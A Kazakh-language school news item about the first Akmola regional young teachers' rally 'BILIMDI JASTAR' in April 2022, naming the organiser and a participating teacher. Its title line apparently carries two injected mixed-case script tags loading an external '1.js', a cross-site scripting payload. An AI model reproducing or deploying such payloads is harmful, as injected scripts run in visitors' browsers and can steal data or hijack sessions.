«BILIMDI JASTAR» I облыстық жас мұғалімдер слеті<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

07.05.2022

2022 жылдың 22-23 сәуір күндері Ақмола облысы Зеренді ауданы Сұңқар сауықтыру кешенінің базасында «BILIMDI JASTAR» 1-ші облыстық жас мұғалімдер слеті өтті.
Іс-шараның негізгі мақсаты: жас мұғалімдердің кәсіби шеберлігін арттыру, жеке шығармашылық бастамаларын қолдау және педагогтардың шығармашылық әлеуетін дамыту.
Ұйымдастырушы – «Ақмола облысы әкімдігінің білім басқармасының облыстық оқу-әдістемелік кабинеті» КММ.
Форумға «Л.Н.Толстой атындағы №4 мектеп-гимназиясы, Степногорск қаласы, Степногорск қаласының білім бөлімі, Ақмола облысының білім басқармасы» КММ ағылшын тілі пәнінің мұғалімі Батирова Жазира Жәнібекқызы қатысты.
Іс-шараны ұйымдастырушылар тәжірибемен оқытуды, тимбилдингті, сындарлы диалогты, жас мамандар мәселесінде перспективалық шешімдер қабылдауды ескере отырып, жан-жақты бағдарлама дайындады.
Н.Довгаль

Просмотров: 358


Пікір қосу



Деректерді қолтаңбаға қосу